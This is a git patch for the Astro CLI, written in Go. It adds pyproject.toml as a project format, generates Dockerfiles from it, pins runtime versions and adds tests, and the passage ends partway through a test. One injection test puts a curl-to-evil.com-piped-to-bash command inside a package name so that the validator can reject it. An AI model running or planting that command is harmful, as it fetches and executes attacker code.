From 06d03a209eaa553cb105cc3dc8c14ece86f077d7 Mon Sep 17 00:00:00 2001 From: Kaxil Naik Date: Thu, 26 Mar 2026 00:16:35 +0000 Subject: [PATCH] Add pyproject.toml as project definition format MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Replace the Dockerfile-centric project definition with pyproject.toml (PEP 621) for Airflow 3 projects. This aligns with the Python ecosystem, enables the uv-based standalone runtime, and lays the groundwork for multi-target compilation. Parser and detection (airflow/project.go): - ReadProject(), IsPyProject(), DetectProjectFormat(), PinRuntimeVersion() - Detection requires [tool.astro] to avoid false positives from ruff/pytest pyproject.toml files astro dev init --format pyproject: - Scaffolds pyproject.toml projects with no Dockerfile or requirements.txt - Resolves airflow-version and runtime-version from the API - Validates: AF3 only, mutual exclusion with --from-template Standalone mode reads pyproject.toml: - Reads versions and dependencies from [tool.astro] and [project] - Falls back to Dockerfile parsing for legacy projects Docker mode generates Dockerfile from pyproject.toml: - GenerateDockerfile() produces FROM + optional apt-get for system packages - EnsureDockerfile() called at build time so pyproject.toml edits are always picked up - Generated file written to .astro/Dockerfile.pyproject (gitignored) - System package names validated against Debian naming rules Runtime version resolution: - runtime-version is optional in pyproject.toml — resolved from airflow-version on first start/build and pinned back to pyproject.toml - Mismatch between airflow-version and runtime-version triggers a warning - Warns users that multiple runtimes exist per Airflow version to prevent accidental upgrades on deploy --- airflow/airflow.go | 32 +++ airflow/airflow_test.go | 66 +++++ airflow/docker.go | 18 +- airflow/docker_image.go | 7 +- airflow/dockerfile_gen.go | 118 +++++++++ airflow/dockerfile_gen_test.go | 146 +++++++++++ airflow/include/airflow3/gitignore | 1 + airflow/include/airflow3/pyprojecttoml | 8 + airflow/project.go | 191 ++++++++++++++ airflow/project_test.go | 329 +++++++++++++++++++++++++ airflow/standalone.go | 159 +++++++++--- airflow/standalone_test.go | 119 +++++++++ airflow_versions/airflow_versions.go | 39 +++ cmd/airflow.go | 62 ++++- cmd/airflow_test.go | 86 +++++++ 15 files changed, 1332 insertions(+), 49 deletions(-) create mode 100644 airflow/dockerfile_gen.go create mode 100644 airflow/dockerfile_gen_test.go create mode 100644 airflow/include/airflow3/pyprojecttoml create mode 100644 airflow/project.go create mode 100644 airflow/project_test.go diff --git a/airflow/airflow.go b/airflow/airflow.go index 99e8eb602..21f4754c1 100644 --- a/airflow/airflow.go +++ b/airflow/airflow.go @@ -90,6 +90,9 @@ var ( //go:embed include/airflow3/requirements-client.txt Af3RequirementsTxtClient string + + //go:embed include/airflow3/pyprojecttoml + Af3PyProjectTOML string ) func initDirs(root string, dirs []string) error { @@ -208,6 +211,35 @@ func Init(path, airflowImageName, airflowImageTag, template, clientImageTag stri return nil } +// InitPyProject scaffolds a new Airflow project using pyproject.toml as the +// project definition instead of a Dockerfile. Only supported for Airflow 3. +func InitPyProject(path, projectName, airflowVersion, runtimeVersion, pythonVersion string) error { + dirs := []string{"dags", "plugins", "include"} + if err := initDirs(path, dirs); err != nil { + return errors.Wrap(err, "failed to create project directories") + } + + files := map[string]string{ + "pyproject.toml": fmt.Sprintf(Af3PyProjectTOML, projectName, pythonVersion, airflowVersion, runtimeVersion), + ".gitignore": Af3Gitignore, + ".dockerignore": Af3Dockerignore, + ".env": "", + "airflow_settings.yaml": Af3Settingsyml, + "packages.txt": "", + "requirements.txt": Af3RequirementsTxt, + "dags/exampledag.py": Af3ExampleDag, + "dags/.airflowignore": "", + "tests/dags/test_dag_example.py": Af3DagExampleTest, + ".astro/test_dag_integrity_default.py": Af3DagIntegrityTestDefault, + ".astro/dag_integrity_exceptions.txt": "# Add dag files to exempt from parse test below. ex: dags/", + } + if err := initFiles(path, files); err != nil { + return errors.Wrap(err, "failed to create project files") + } + + return nil +} + // repositoryName creates an airflow repository name func repositoryName(name string) string { return fmt.Sprintf("%s/%s", name, componentName) diff --git a/airflow/airflow_test.go b/airflow/airflow_test.go index b6cc55072..271d64977 100644 --- a/airflow/airflow_test.go +++ b/airflow/airflow_test.go @@ -172,6 +172,72 @@ func (s *Suite) TestInitWithoutClientImageTag() { } } +func (s *Suite) TestInitPyProject() { + tmpDir, err := os.MkdirTemp("", "temp") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + err = InitPyProject(tmpDir, "my-project", "3.0.1", "3.0-7", "3.12") + s.NoError(err) + + // Files that SHOULD exist + expectedFiles := []string{ + "pyproject.toml", + ".gitignore", + ".env", + "airflow_settings.yaml", + "dags/exampledag.py", + "dags/.airflowignore", + "tests/dags/test_dag_example.py", + ".astro/test_dag_integrity_default.py", + ".astro/dag_integrity_exceptions.txt", + } + for _, file := range expectedFiles { + exist, err := fileutil.Exists(filepath.Join(tmpDir, file), nil) + s.NoError(err) + s.True(exist, "Expected file %s to exist", file) + } + + // Files that should NOT exist (Dockerfile-format-specific) + dockerFiles := []string{ + "Dockerfile", + "README.md", + } + for _, file := range dockerFiles { + exist, err := fileutil.Exists(filepath.Join(tmpDir, file), nil) + s.NoError(err) + s.False(exist, "Expected file %s to NOT exist", file) + } + + // Verify pyproject.toml content + content, err := os.ReadFile(filepath.Join(tmpDir, "pyproject.toml")) + s.NoError(err) + s.Contains(string(content), `name = "my-project"`) + s.Contains(string(content), `requires-python = ">=3.12"`) + s.Contains(string(content), `airflow-version = "3.0.1"`) + s.Contains(string(content), `runtime-version = "3.0-7"`) + s.NotContains(string(content), "Dockerfile") +} + +func (s *Suite) TestInitPyProject_CanBeReadBack() { + tmpDir, err := os.MkdirTemp("", "temp") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + err = InitPyProject(tmpDir, "roundtrip-test", "3.0.1", "3.0-7", "3.12") + s.NoError(err) + + // Read it back with our parser from Phase 1 + proj, err := ReadProject(tmpDir) + s.NoError(err) + s.Equal("roundtrip-test", proj.Name) + s.Equal(">=3.12", proj.RequiresPython) + s.Equal("3.0.1", proj.AirflowVersion) + s.Equal("3.0-7", proj.RuntimeVersion) + s.Equal("docker", proj.Mode) // default when not specified in template + s.Empty(proj.Dependencies) // empty list in template +} + func (s *Suite) TestTemplateInitFail() { ExtractTemplate = func(templateDir, destDir string) error { err := errors.New("error extracting files") diff --git a/airflow/docker.go b/airflow/docker.go index b895b3d37..0006add79 100644 --- a/airflow/docker.go +++ b/airflow/docker.go @@ -245,6 +245,12 @@ func (d *DockerCompose) Start(opts *airflowTypes.StartOptions) error { envConns := opts.EnvConns useProxy := !opts.NoProxy + // Resolve Dockerfile: for pyproject.toml projects, generate from project definition. + dockerfile, resolveErr := EnsureDockerfile(d.airflowHome, d.dockerfile) + if resolveErr != nil { + return fmt.Errorf("error resolving Dockerfile: %w", resolveErr) + } + // Build this project image if imageName == "" { if !config.CFG.DisableAstroRun.GetBool() { @@ -254,7 +260,7 @@ func (d *DockerCompose) Start(opts *airflowTypes.StartOptions) error { fmt.Printf("Adding 'astro-run-dag' package to requirements.txt unsuccessful: %s\nManually add package to requirements.txt", err.Error()) } } - imageBuildErr := d.imageHandler.Build(d.dockerfile, buildSecretString, airflowTypes.ImageBuildConfig{Path: d.airflowHome, NoCache: noCache}) + imageBuildErr := d.imageHandler.Build(dockerfile, buildSecretString, airflowTypes.ImageBuildConfig{Path: d.airflowHome, NoCache: noCache}) if !config.CFG.DisableAstroRun.GetBool() { // remove astro-run-dag from requirments.txt err := fileutil.RemoveLineFromFile("./requirements.txt", "astro-run-dag", " # This package is needed for the astro run command. It will be removed before a deploy") @@ -1329,8 +1335,14 @@ func (d *DockerCompose) Build(customImageName, buildSecretString string, noCache return d.imageHandler.TagLocalImage(customImageName) } - // Build the image - return d.imageHandler.Build(d.dockerfile, buildSecretString, airflowTypes.ImageBuildConfig{ + // Resolve Dockerfile: for pyproject.toml projects, generate from project definition. + // Done at build time (not init) so changes to pyproject.toml are always picked up. + dockerfile, err := EnsureDockerfile(d.airflowHome, d.dockerfile) + if err != nil { + return fmt.Errorf("error resolving Dockerfile: %w", err) + } + + return d.imageHandler.Build(dockerfile, buildSecretString, airflowTypes.ImageBuildConfig{ Path: d.airflowHome, NoCache: noCache, }) diff --git a/airflow/docker_image.go b/airflow/docker_image.go index 952bd7644..bdb1d9363 100644 --- a/airflow/docker_image.go +++ b/airflow/docker_image.go @@ -99,7 +99,12 @@ func (d *DockerImage) Build(dockerfilePath, buildSecretString string, buildConfi return err } if dockerfilePath == "" { - dockerfilePath = "Dockerfile" + // For pyproject.toml projects, generate a Dockerfile from the project definition. + resolved, resolveErr := EnsureDockerfile(buildConfig.Path, "Dockerfile") + if resolveErr != nil { + return fmt.Errorf("error resolving Dockerfile: %w", resolveErr) + } + dockerfilePath = resolved } args := []string{"build"} addPullFlag, err := shouldAddPullFlag(dockerfilePath) diff --git a/airflow/dockerfile_gen.go b/airflow/dockerfile_gen.go new file mode 100644 index 000000000..521f2610a --- /dev/null +++ b/airflow/dockerfile_gen.go @@ -0,0 +1,118 @@ +package airflow + +import ( + "fmt" + "os" + "path/filepath" + "regexp" + "strings" + + airflowversions "github.com/astronomer/astro-cli/airflow_versions" +) + +const ( + generatedDockerfileComment = "# Auto-generated from pyproject.toml — do not edit.\n# Changes should be made in pyproject.toml.\n" + genDirPerm = os.FileMode(0o755) //nolint:mnd + genFilePerm = os.FileMode(0o644) //nolint:mnd + generatedDockerfileName = "Dockerfile.pyproject" +) + +// validDebPkgRe matches valid Debian package names: starts with alnum, then alnum/./+/- +var validDebPkgRe = regexp.MustCompile(`^[a-zA-Z0-9][a-zA-Z0-9.+\-]*$`) + +// GenerateDockerfile produces Dockerfile content from an AstroProject. +// Returns an error if the project has invalid fields. +func GenerateDockerfile(project *AstroProject) (string, error) { + if project.RuntimeVersion == "" { + return "", fmt.Errorf("runtime-version is required to generate a Dockerfile") + } + + for _, pkg := range project.SystemPackages { + if !validDebPkgRe.MatchString(pkg) { + return "", fmt.Errorf("invalid system package name %q: must match Debian package naming rules", pkg) + } + } + + var b strings.Builder + + b.WriteString(generatedDockerfileComment) + + imageName := AstroRuntimeAirflow3ImageName + registry := AstroImageRegistryBaseImageName + b.WriteString(fmt.Sprintf("FROM %s/%s:%s\n", registry, imageName, project.RuntimeVersion)) + + if len(project.SystemPackages) > 0 { + b.WriteString("USER root\n") + b.WriteString(fmt.Sprintf( + "RUN apt-get update && apt-get install -y --no-install-recommends %s && rm -rf /var/lib/apt/lists/*\n", + strings.Join(project.SystemPackages, " "), + )) + b.WriteString("USER astro\n") + } + + return b.String(), nil +} + +// EnsureDockerfile checks if the project uses pyproject.toml and generates +// a Dockerfile in .astro/ if needed. Returns the path to the Dockerfile to use +// (either the generated one or the original). +func EnsureDockerfile(airflowHome, originalDockerfile string) (string, error) { + proj, found, err := TryReadProject(airflowHome) + if !found { + return originalDockerfile, nil + } + if err != nil { + return "", fmt.Errorf("error reading pyproject.toml: %w", err) + } + + // If a hand-written Dockerfile exists in the project root, use it instead + // of generating one. This supports users who need custom Docker steps + // beyond what pyproject.toml can express (the "eject" pattern). + dockerfilePath := filepath.Join(airflowHome, "Dockerfile") + if _, err := os.Stat(dockerfilePath); err == nil { + return "Dockerfile", nil + } + + // Resolve runtime-version from airflow-version if missing, and pin it + if proj.RuntimeVersion == "" { + if proj.AirflowVersion == "" { + return "", fmt.Errorf("[tool.astro] requires airflow-version in pyproject.toml") + } + resolved := airflowversions.GetLatestRuntimeForAirflow(proj.AirflowVersion) + if resolved == "" { + return "", fmt.Errorf("could not resolve a runtime version for airflow-version %q", proj.AirflowVersion) + } + fmt.Printf("Resolved runtime-version %q for airflow-version %q (pinning to pyproject.toml)\n", resolved, proj.AirflowVersion) + fmt.Println("Note: one airflow-version may have multiple runtime versions. Pin runtime-version in pyproject.toml to avoid accidental upgrades on deploy.") + if pinErr := PinRuntimeVersion(airflowHome, resolved); pinErr != nil { + fmt.Printf("Warning: could not pin runtime-version to pyproject.toml: %s\n", pinErr) + } + proj.RuntimeVersion = resolved + } + + // Validate airflow-version matches runtime-version + if proj.AirflowVersion != "" { + actual := airflowversions.GetAirflowVersionForRuntime(proj.RuntimeVersion) + if actual != "" && actual != proj.AirflowVersion { + fmt.Printf("Warning: airflow-version %q in pyproject.toml does not match runtime-version %q (which bundles Airflow %s). Consider updating airflow-version or runtime-version.\n", + proj.AirflowVersion, proj.RuntimeVersion, actual) + } + } + + content, err := GenerateDockerfile(proj) + if err != nil { + return "", err + } + + genDir := filepath.Join(airflowHome, ".astro") + if err := os.MkdirAll(genDir, genDirPerm); err != nil { + return "", fmt.Errorf("error creating .astro directory: %w", err) + } + + genPath := filepath.Join(genDir, generatedDockerfileName) + if err := os.WriteFile(genPath, []byte(content), genFilePerm); err != nil { + return "", fmt.Errorf("error writing generated Dockerfile: %w", err) + } + + return genPath, nil +} diff --git a/airflow/dockerfile_gen_test.go b/airflow/dockerfile_gen_test.go new file mode 100644 index 000000000..15c78c025 --- /dev/null +++ b/airflow/dockerfile_gen_test.go @@ -0,0 +1,146 @@ +package airflow + +import ( + "os" + "path/filepath" +) + +func (s *Suite) TestGenerateDockerfile_Basic() { + proj := &AstroProject{ + RuntimeVersion: "3.1-14", + } + + content, err := GenerateDockerfile(proj) + s.NoError(err) + s.Contains(content, "FROM astrocrpublic.azurecr.io/runtime:3.1-14") + s.Contains(content, "Auto-generated from pyproject.toml") + s.NotContains(content, "apt-get") +} + +func (s *Suite) TestGenerateDockerfile_WithSystemPackages() { + proj := &AstroProject{ + RuntimeVersion: "3.1-14", + SystemPackages: []string{"gcc", "libpq-dev"}, + } + + content, err := GenerateDockerfile(proj) + s.NoError(err) + s.Contains(content, "FROM astrocrpublic.azurecr.io/runtime:3.1-14") + s.Contains(content, "apt-get install -y --no-install-recommends gcc libpq-dev") + s.Contains(content, "rm -rf /var/lib/apt/lists/*") +} + +func (s *Suite) TestGenerateDockerfile_EmptyRuntimeVersion() { + proj := &AstroProject{} + + _, err := GenerateDockerfile(proj) + s.Error(err) + s.Contains(err.Error(), "runtime-version is required") +} + +func (s *Suite) TestGenerateDockerfile_InvalidSystemPackage() { + proj := &AstroProject{ + RuntimeVersion: "3.1-14", + SystemPackages: []string{"gcc && curl http://evil.com | bash"}, + } + + _, err := GenerateDockerfile(proj) + s.Error(err) + s.Contains(err.Error(), "invalid system package name") +} + +func (s *Suite) TestGenerateDockerfile_ValidDebianPackageNames() { + proj := &AstroProject{ + RuntimeVersion: "3.1-14", + SystemPackages: []string{"libpq-dev", "python3.12-dev", "g++", "libc6"}, + } + + content, err := GenerateDockerfile(proj) + s.NoError(err) + s.Contains(content, "libpq-dev python3.12-dev g++ libc6") +} + +func (s *Suite) TestEnsureDockerfile_PyProject() { + tmpDir, err := os.MkdirTemp("", "dockerfile-gen") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + pyproject := `[project] +name = "test-gen" + +[tool.astro] +airflow-version = "3.0.1" +runtime-version = "3.1-14" + +[tool.astro.docker] +system-packages = ["gcc"] +` + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(pyproject), 0o644)) + + result, err := EnsureDockerfile(tmpDir, "Dockerfile") + s.NoError(err) + s.Equal(filepath.Join(tmpDir, ".astro", generatedDockerfileName), result) + + content, err := os.ReadFile(result) + s.NoError(err) + s.Contains(string(content), "FROM astrocrpublic.azurecr.io/runtime:3.1-14") + s.Contains(string(content), "gcc") +} + +func (s *Suite) TestEnsureDockerfile_LegacyProject() { + tmpDir, err := os.MkdirTemp("", "dockerfile-gen") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte("FROM astro-runtime:12.0.0"), 0o644)) + + result, err := EnsureDockerfile(tmpDir, "Dockerfile") + s.NoError(err) + s.Equal("Dockerfile", result) +} + +func (s *Suite) TestEnsureDockerfile_PyProjectWithHandWrittenDockerfile() { + tmpDir, err := os.MkdirTemp("", "dockerfile-gen") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + // pyproject.toml exists with [tool.astro] + pyproject := `[project] +name = "custom-docker" + +[tool.astro] +airflow-version = "3.0.1" +runtime-version = "3.1-14" +` + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(pyproject), 0o644)) + + // Hand-written Dockerfile also exists — should take precedence + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte("FROM custom-image:latest\nRUN custom-step"), 0o644)) + + result, err := EnsureDockerfile(tmpDir, "Dockerfile") + s.NoError(err) + s.Equal("Dockerfile", result) + + // Generated Dockerfile should NOT exist + _, err = os.Stat(filepath.Join(tmpDir, ".astro", generatedDockerfileName)) + s.True(os.IsNotExist(err)) +} + +func (s *Suite) TestEnsureDockerfile_BrokenPyProject() { + tmpDir, err := os.MkdirTemp("", "dockerfile-gen") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + // pyproject.toml with [tool.astro] but missing airflow-version — should error, not silently fall through + pyproject := `[project] +name = "test-no-versions" + +[tool.astro] +mode = "docker" +` + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(pyproject), 0o644)) + + _, err = EnsureDockerfile(tmpDir, "Dockerfile") + s.Error(err) + s.Contains(err.Error(), "airflow-version") +} diff --git a/airflow/include/airflow3/gitignore b/airflow/include/airflow3/gitignore index 0e8bcca90..2f15a2f45 100644 --- a/airflow/include/airflow3/gitignore +++ b/airflow/include/airflow3/gitignore @@ -9,3 +9,4 @@ airflow-webserver.pid webserver_config.py airflow.cfg airflow.db +.astro/Dockerfile.pyproject diff --git a/airflow/include/airflow3/pyprojecttoml b/airflow/include/airflow3/pyprojecttoml new file mode 100644 index 000000000..66861eda3 --- /dev/null +++ b/airflow/include/airflow3/pyprojecttoml @@ -0,0 +1,8 @@ +[project] +name = "%[1]s" +requires-python = ">=%[2]s" +dependencies = [] + +[tool.astro] +airflow-version = "%[3]s" +runtime-version = "%[4]s" diff --git a/airflow/project.go b/airflow/project.go new file mode 100644 index 000000000..dcf8036c7 --- /dev/null +++ b/airflow/project.go @@ -0,0 +1,191 @@ +package airflow + +import ( + "fmt" + "os" + "path/filepath" + "regexp" + "strings" + + toml "github.com/pelletier/go-toml/v2" +) + +const ( + PyProjectFile = "pyproject.toml" + ProjectFormatPy = "pyproject" + ProjectFormatDocker = "dockerfile" + ProjectFormatUnknown = "unknown" + DefaultMode = "docker" + DefaultPythonVersion = "3.12" + ModeStandalone = "standalone" + ModeDocker = "docker" +) + +// pyProjectTOML mirrors the subset of pyproject.toml we care about. +// Used only for reading — PinRuntimeVersion uses targeted text editing +// to avoid destroying user content outside this struct. +type pyProjectTOML struct { + Project struct { + Name string `toml:"name"` + RequiresPython string `toml:"requires-python"` + Dependencies []string `toml:"dependencies"` + } `toml:"project"` + Tool struct { + Astro *astroToolConfig `toml:"astro"` + } `toml:"tool"` +} + +type astroToolConfig struct { + AirflowVersion string `toml:"airflow-version"` + RuntimeVersion string `toml:"runtime-version"` + Mode string `toml:"mode"` + Docker *astroDockerCfg `toml:"docker"` +} + +type astroDockerCfg struct { + SystemPackages []string `toml:"system-packages"` +} + +// AstroProject is the parsed, validated representation of an Astro project +// defined via pyproject.toml. +type AstroProject struct { + Name string + RequiresPython string + Dependencies []string + AirflowVersion string + RuntimeVersion string + Mode string + SystemPackages []string +} + +// ReadProject parses pyproject.toml at the given project root and returns an +// AstroProject. Returns (nil, nil) if no pyproject.toml exists. Returns +// (nil, error) if the file exists but is broken (bad TOML, missing [tool.astro], etc.). +func ReadProject(projectPath string) (*AstroProject, error) { + proj, _, err := TryReadProject(projectPath) + return proj, err +} + +// TryReadProject attempts to read pyproject.toml. Returns (nil, false, nil) if +// no pyproject.toml exists (not an error). Returns (nil, true, err) if the file +// exists but is broken. Returns (proj, true, nil) on success. +func TryReadProject(projectPath string) (proj *AstroProject, found bool, err error) { + filePath := filepath.Join(projectPath, PyProjectFile) + + data, err := os.ReadFile(filePath) + if err != nil { + if os.IsNotExist(err) { + return nil, false, nil + } + return nil, true, fmt.Errorf("failed to read %s: %w", PyProjectFile, err) + } + + var raw pyProjectTOML + if unmarshalErr := toml.Unmarshal(data, &raw); unmarshalErr != nil { + return nil, true, fmt.Errorf("failed to parse %s: %w", PyProjectFile, unmarshalErr) + } + + if raw.Tool.Astro == nil { + return nil, true, fmt.Errorf("%s does not contain a [tool.astro] section", PyProjectFile) + } + + astro := raw.Tool.Astro + + if astro.AirflowVersion == "" { + return nil, true, fmt.Errorf("[tool.astro].airflow-version is required in %s", PyProjectFile) + } + + mode := astro.Mode + if mode == "" { + mode = DefaultMode + } + if mode != ModeStandalone && mode != ModeDocker { + return nil, true, fmt.Errorf("[tool.astro].mode must be %q or %q, got %q", ModeStandalone, ModeDocker, mode) + } + + var systemPackages []string + if astro.Docker != nil { + systemPackages = astro.Docker.SystemPackages + } + + return &AstroProject{ + Name: raw.Project.Name, + RequiresPython: raw.Project.RequiresPython, + Dependencies: raw.Project.Dependencies, + AirflowVersion: astro.AirflowVersion, + RuntimeVersion: astro.RuntimeVersion, + Mode: mode, + SystemPackages: systemPackages, + }, true, nil +} + +// IsPyProject returns true if the project at the given path is defined via +// pyproject.toml with a [tool.astro] section. It does not validate the file +// beyond checking for the section's existence. +func IsPyProject(projectPath string) bool { + filePath := filepath.Join(projectPath, PyProjectFile) + + data, err := os.ReadFile(filePath) + if err != nil { + return false + } + + var raw pyProjectTOML + if err := toml.Unmarshal(data, &raw); err != nil { + return false + } + + return raw.Tool.Astro != nil +} + +// PinRuntimeVersion sets the runtime-version field in the [tool.astro] +// section of pyproject.toml. Uses targeted text editing (not full TOML +// roundtrip) to preserve all other content — user comments, [tool.ruff], +// [build-system], [[tool.uv.index]], etc. +func PinRuntimeVersion(projectPath, runtimeVersion string) error { + filePath := filepath.Join(projectPath, PyProjectFile) + data, err := os.ReadFile(filePath) + if err != nil { + return fmt.Errorf("failed to read %s: %w", PyProjectFile, err) + } + + content := string(data) + + // Try to replace existing runtime-version line + re := regexp.MustCompile(`(?m)^(\s*)runtime-version\s*=\s*["'][^"']*["']`) + if re.MatchString(content) { + content = re.ReplaceAllStringFunc(content, func(match string) string { + indent := match[:len(match)-len(strings.TrimLeft(match, " \t"))] + return fmt.Sprintf("%sruntime-version = %q", indent, runtimeVersion) + }) + } else { + // Insert after airflow-version line + avRe := regexp.MustCompile(`(?m)(^[ \t]*airflow-version\s*=\s*["'][^"']*["'][ \t]*)$`) + if avRe.MatchString(content) { + content = avRe.ReplaceAllStringFunc(content, func(match string) string { + indent := match[:len(match)-len(strings.TrimLeft(match, " \t"))] + return fmt.Sprintf("%s\n%sruntime-version = %q", match, indent, runtimeVersion) + }) + } else { + return fmt.Errorf("could not find airflow-version in %s to insert runtime-version", PyProjectFile) + } + } + + return os.WriteFile(filePath, []byte(content), 0o644) //nolint:gosec,mnd +} + +// DetectProjectFormat determines the project format at the given path. +// Returns ProjectFormatPy if pyproject.toml with [tool.astro] exists, +// ProjectFormatDocker if a Dockerfile exists, or ProjectFormatUnknown. +func DetectProjectFormat(projectPath string) string { + if IsPyProject(projectPath) { + return ProjectFormatPy + } + + dockerfilePath := filepath.Join(projectPath, "Dockerfile") + if _, err := os.Stat(dockerfilePath); err == nil { + return ProjectFormatDocker + } + + return ProjectFormatUnknown +} diff --git a/airflow/project_test.go b/airflow/project_test.go new file mode 100644 index 000000000..27f7c43cd --- /dev/null +++ b/airflow/project_test.go @@ -0,0 +1,329 @@ +package airflow + +import ( + "os" + "path/filepath" +) + +const validPyProject = `[project] +name = "my-airflow-project" +requires-python = ">=3.12" +dependencies = [ + "apache-airflow-providers-snowflake>=5.0", + "pandas>=2.0", +] + +[tool.astro] +airflow-version = "3.0.1" +runtime-version = "13.0.0" +mode = "standalone" + +[tool.astro.docker] +system-packages = ["gcc", "libpq-dev"] +` + +const minimalPyProject = `[project] +name = "minimal" + +[tool.astro] +airflow-version = "3.0.1" +` + +const noAstroSection = `[project] +name = "just-ruff" + +[tool.ruff] +line-length = 120 +` + +const invalidMode = `[project] +name = "bad-mode" + +[tool.astro] +airflow-version = "3.0.1" +mode = "kubernetes" +` + +const missingAirflowVersion = `[project] +name = "no-version" + +[tool.astro] +runtime-version = "13.0.0" +` + +// --- ReadProject tests --- + +func (s *Suite) TestReadProject_Valid() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(validPyProject), 0o644)) + + proj, err := ReadProject(tmpDir) + s.NoError(err) + s.Equal("my-airflow-project", proj.Name) + s.Equal(">=3.12", proj.RequiresPython) + s.Equal([]string{"apache-airflow-providers-snowflake>=5.0", "pandas>=2.0"}, proj.Dependencies) + s.Equal("3.0.1", proj.AirflowVersion) + s.Equal("13.0.0", proj.RuntimeVersion) + s.Equal("standalone", proj.Mode) + s.Equal([]string{"gcc", "libpq-dev"}, proj.SystemPackages) +} + +func (s *Suite) TestReadProject_Minimal() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(minimalPyProject), 0o644)) + + proj, err := ReadProject(tmpDir) + s.NoError(err) + s.Equal("minimal", proj.Name) + s.Equal("", proj.RequiresPython) + s.Nil(proj.Dependencies) + s.Equal("3.0.1", proj.AirflowVersion) + s.Equal("", proj.RuntimeVersion) + s.Equal("docker", proj.Mode) // default + s.Nil(proj.SystemPackages) +} + +func (s *Suite) TestReadProject_NoAstroSection() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(noAstroSection), 0o644)) + + _, err = ReadProject(tmpDir) + s.Error(err) + s.Contains(err.Error(), "[tool.astro]") +} + +func (s *Suite) TestReadProject_InvalidMode() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(invalidMode), 0o644)) + + _, err = ReadProject(tmpDir) + s.Error(err) + s.Contains(err.Error(), "kubernetes") +} + +func (s *Suite) TestReadProject_MissingAirflowVersion() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(missingAirflowVersion), 0o644)) + + _, err = ReadProject(tmpDir) + s.Error(err) + s.Contains(err.Error(), "airflow-version") +} + +func (s *Suite) TestReadProject_FileNotFound() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + proj, err := ReadProject(tmpDir) + s.NoError(err) // missing file is not an error — just means not a pyproject project + s.Nil(proj) +} + +func (s *Suite) TestTryReadProject_FileNotFound() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + proj, found, err := TryReadProject(tmpDir) + s.NoError(err) + s.False(found) + s.Nil(proj) +} + +func (s *Suite) TestTryReadProject_BrokenTOML() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte("{{broken"), 0o644)) + + proj, found, err := TryReadProject(tmpDir) + s.True(found) // file exists + s.Error(err) // but is broken + s.Nil(proj) +} + +func (s *Suite) TestReadProject_InvalidTOML() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte("{{invalid toml"), 0o644)) + + _, err = ReadProject(tmpDir) + s.Error(err) + s.Contains(err.Error(), "failed to parse") +} + +// --- IsPyProject tests --- + +func (s *Suite) TestIsPyProject_WithAstroSection() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(validPyProject), 0o644)) + + s.True(IsPyProject(tmpDir)) +} + +func (s *Suite) TestIsPyProject_WithoutAstroSection() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(noAstroSection), 0o644)) + + s.False(IsPyProject(tmpDir)) +} + +func (s *Suite) TestIsPyProject_NoFile() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.False(IsPyProject(tmpDir)) +} + +// --- DetectProjectFormat tests --- + +func (s *Suite) TestDetectProjectFormat_PyProject() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, PyProjectFile), []byte(validPyProject), 0o644)) + + s.Equal(ProjectFormatPy, DetectProjectFormat(tmpDir)) +} + +func (s *Suite) TestDetectProjectFormat_Dockerfile() { + tmpDir, err := os.MkdirTemp("", "pyproject") + s.Require().NoError(err) + defer os.RemoveAll(tmpDir) + + s.Require().NoError(os.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte("FROM astro-runtime:12.0.0"), 0o644)) + + s.Equal(ProjectFormatDocker, DetectProjectFormat(tmpDir)) +} + +func (s *Suite) TestDetectProjectFormat_BothPrefersPyProject() { + tmpDir, err := os.MkdirTemp("", 